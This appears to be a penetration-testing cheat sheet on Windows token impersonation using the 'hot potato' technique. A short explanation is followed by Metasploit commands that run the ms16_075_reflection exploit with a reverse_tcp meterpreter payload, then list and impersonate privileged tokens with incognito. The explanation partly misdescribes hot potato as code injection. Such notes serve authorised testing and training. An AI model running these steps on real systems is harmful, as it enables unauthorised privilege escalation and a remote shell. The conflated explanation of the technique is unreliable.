Token Impersonation

General

Token impersonation is a technique that allows a user or process to assume the identity of another user or process in order to access resources or perform actions that would not normally be allowed. In the context of Windows operating systems, token impersonation is often used to gain access to resources or perform actions that require higher privileges.

Token impersonation with "hot potato" refers to a technique used in Windows exploitation that involves stealing an authentication token from a privileged process and using it to impersonate a user with higher privileges. This allows an attacker to perform actions that the user would not normally have the permissions to do.

To perform token impersonation with "hot potato," the attacker typically uses a vulnerability in a process that is running with higher privileges to inject code into the process. This code then steals the authentication token from the process and uses it to impersonate the user associated with the token. The attacker can then use this impersonated token to perform actions on the system that would normally require higher privileges.

It's important to note that this technique requires the attacker to already have some level of access to the system, as they need to be able to inject code into a privileged process in order to steal the authentication token. However, once they have successfully stolen the token through the "hot potato" attack, they can use it to escalate their privileges and gain further access to the system.

More info about the hot potato exploit ---> https://foxglovesecurity.com/2016/01/16/hot-potato/

Hot Potato ---> Manual Option
Meterpreter ---> Automated Option

Commands

These commands should be run from a Metasploit console in which you already have a meterpreter session (initial access) on the target.

# Use Exploit (from the msfconsole prompt; X is the id of your existing meterpreter session)
use exploit/windows/local/ms16_075_reflection
set payload windows/x64/meterpreter/reverse_tcp
show options
set SESSION X
run

# Check Tokens (interact with the new session, then load the incognito extension)
sessions -i X
load incognito
list_tokens -u                      # list available tokens, grouped by user
impersonate_token "TOKEN_CHOSEN"    # token name exactly as shown by list_tokens; escape backslashes as \\
getuid                              # confirm the identity now in use